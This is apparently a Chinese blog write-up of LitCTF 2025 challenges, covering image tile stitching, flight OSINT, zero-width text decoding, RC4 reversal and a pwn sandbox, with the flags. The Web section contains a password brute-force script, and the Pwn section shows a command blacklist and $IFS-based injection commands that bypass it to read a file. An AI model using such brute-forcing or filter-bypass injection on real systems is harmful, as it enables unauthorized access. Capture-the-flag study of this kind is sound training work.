LitCTF 2025

LitCTF 2025

Aristore
  2025-05-26 15:10 2025-05-26 15:10 创建    1.3k 字  6 分钟  

Misc

Cropping

Challenge

Solution

伪加密修复后解压两次得到图片碎片,用脚本拼起来得到二维码,扫描即可得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from PIL import Image
import os

# 设置路径
folder = 'tiles'

# 获取所有 tile_x_y.png 文件
tiles = [f for f in os.listdir(folder) if f.startswith("tile_") and f.endswith(".png")]

# 排序确保正确顺序:tile_row_col.png
# 我们可以根据文件名中的 row 和 col 数字排序
def tile_key(fname):
    parts = fname.replace("tile_", "").replace(".png", "").split("_")
    return int(parts[0]), int(parts[1])

tiles.sort(key=tile_key)

# 打开第一张图片获取宽高
first_tile = Image.open(os.path.join(folder, tiles[0]))
tile_width, tile_height = first_tile.size

# 假设是 10x10 网格布局
rows = 10
cols = 10

# 创建空白大图像
final_image = Image.new('RGBA', (cols * tile_width, rows * tile_height))

# 逐个加载并粘贴图片
for idx, tile_file in enumerate(tiles):
    img = Image.open(os.path.join(folder, tile_file))
    row = idx // cols
    col = idx % cols
    final_image.paste(img, (col * tile_width, row * tile_height))

# 保存最终图像
output_path = 'final_map.png'
final_image.save(output_path)

print(f"拼接完成,已保存为: {output_path}")

LitCTF2025-1

1
LitCTF{e7c3f4b2-9a6f-4d3f-9f98-0b3db91c2a12}

灵感菇🍄哩菇哩菇哩哇擦灵感菇灵感菇🍄

Challenge

哇擦灵感菇

Solution

真有人拿这个出题啊?

LitCTF2025-2

ProbiusOfficial/Lingicrypt: 一个为玩梗而粗制滥造的编码*

LitCTF2025-3

1
NSSCTF{41d0c8df-62e5-4866-8de8-120c6a50c14a}

像素中的航班

Challenge

小李要去参见长城杯了,他乘坐的哪趟航班?flag格式:LitCTF{航班号}

LitCTF2025-4

Solution

搜索长城杯发现第二届“长城杯”信息安全铁人三项赛(防护赛)总决赛将于2025年4月28日在福建省福州市举办,因此推断到达机场为长乐机场(FOC),且到达时间为2025年4月28日或前一两天。

LitCTF2025-5

放大看机翼上的文字能看出来是南方航空,因此可以确定航班号以CZ开头

接下来搜索南航最常飞的城市China Southern Airlines 航空公司信息,看到郑州基本上就确定是出发机场是**郑州新郑国际机场(CGO)**了,因为比赛主办方在郑州

LitCTF2025-6

然后就搜索CGO->FOC,且航班号以CZ开头的就行[All Flights From Zhengzhou (CGO) to Fuzhou (FOC): DEPARTURES/ARRIVALS/STATISTICS](https://www.flightera.net/route/ZHCC/ZSFZ/2025-04-28 13_55)

LitCTF2025-7

不难发现航班号只有CZ8289CZ6917这两种,分别试一遍就出来了

1
LitCTF{CZ8289}

消失的文字

Challenge

Solution

此题为赛后复现

USB流量一把梭,经过旋转反转得到下图

LitCTF2025-11

比赛时我看漏了横杠,误以为是868F83BDFF

感谢F1eed0m师傅的提醒,应该加上两个横杠868F-83BD-FF,这用于解开压缩包

压缩包内的hidden-word.txt如下

1
Litctf~󠄼 Litct󠅙f! Litctf? This󠅤 is a co󠄳ntest of technology an󠅄d w󠄶isdom, focusing󠅫 on cyber󠄣secu󠄩rity, program󠄥m󠄥ing ski󠄣l󠄣ls, 󠄡an󠄧d pu󠄝zzle-sol󠅔ving abil󠅖it󠄣ie󠄠s. In this c󠄝ompetition named Litctf󠄤, partic󠄩ipa󠄥nts󠄡 will face 󠄝a series of󠄨 c󠅑omplex p󠅑roblems and󠅔 t󠄝asks t󠅖hat󠅓 r󠅑equire󠅖 t󠄣he appl󠄠ication of their k󠄢no󠄨wl󠅓edge and crea󠅑tiv󠄩ity 󠅔t󠅭o solve.

这里用到这个项目Ackites/hidden-word进行解密,在线解密Hidden Word

LitCTF2025-12

1
LitCTF{39553317-df30-4951-8aad-fcaf3028ca9d}

Web

nest_js

Challenge

/dashboard

Solution

弱口令爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests

url = "http://node12.anna.nssctf.cn:23792/api/login"
username = "admin"
rememberMe = False
password_file = "pass.txt"

with open(password_file, "r", encoding="utf-8") as f:
    for line in f:
        password = line.strip()

        data = {
            "username": username,
            "password": password,
            "rememberMe": rememberMe
        }

        try:
            print(f"[+] 尝试密码: {password}")
            response = requests.post(url, json=data, timeout=5)

            if response.status_code == 200:
                print(f"[!] 登录成功!密码是:{password}")
                print(response.text)
                break
            else:
                print(f"[-] 登录失败,状态码: {response.status_code}")
                print(response.text)
        except Exception as e:
            print(f"[ERROR] 请求异常: {e}")

账号admin,密码password

1
LitCTF{b11dd2bc-935b-47d7-ada1-dd12a3140c4a}

Reverse

easy_rc4

Challenge

flag格式:LitCTF{}

Solution

在主函数找到密钥和密文

LitCTF2025-8

查看rc4_crypt函数发现是魔改rc4,异或了0x20

LitCTF2025-9

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    result = []
    for k in range(len(data)):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        keystream = S[t]
        decrypted = keystream ^ data[k] ^ 0x20  # 这里有个异或 0x20
        result.append(decrypted)
    return bytes(result)

# RC4 密钥
key = "FenKey!!"

# RC4 密文(来自 s2)
s2_data = bytes.fromhex(
    '78cc4e1331f47349'
    '4f6c4f73c0f4357e'
    'ce27764d19607aea'
    '445dc04281da1cf6'
    '647258d994faf813'
)

flag = rc4(key, s2_data)
print(flag.decode('utf-8', errors='replace'))
1
LitCTF{71bb2a06417a5306ba297ddcfce7b1b0}

Pwn

test_your_nc

Challenge

签到

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/python3
import os

print("input your command")

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}','sh','\\']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

Solution

由于ls被ban了,所以考虑用Python的os.listdir()查看目录下文件

但是空格和${IFS}也被ban了,因此用$IFS$1绕过

Python命令用了点pyjail的技巧

构造命令print(__import__('os').listdir('.'))查看当前目录下的文件

1
python3$IFS$1-c$IFS$1"print(__import__('os').listdir('.'))"

发现当前目录有文件flag,直接输出读取结果即可

1
python3$IFS$1-c$IFS$1"print(open('flag','r').read())"

LitCTF2025-10

1
NSSCTF{7d6922ba-d89e-41eb-9236-9d7000aea7c8}
  • 标题: LitCTF 2025
  • 作者: Aristore
  • 创建于 : 2025-05-26 15:10:00
  • 更新于 : 2025-05-26 15:05:28
  • 链接: https://www.aristore.top/posts/LitCTF2025/
  • 版权声明: 版权所有 © Aristore,禁止转载。
评论
目录
LitCTF 2025
  1. Misc
    1. Cropping
      1. Challenge
      2. Solution
    2. 灵感菇🍄哩菇哩菇哩哇擦灵感菇灵感菇🍄
      1. Challenge
      2. Solution
    3. 像素中的航班
      1. Challenge
      2. Solution
    4. 消失的文字
      1. Challenge
      2. Solution
  2. Web
    1. nest_js
      1. Challenge
      2. Solution
  3. Reverse
    1. easy_rc4
      1. Challenge
      2. Solution
  4. Pwn
    1. test_your_nc
      1. Challenge
      2. Solution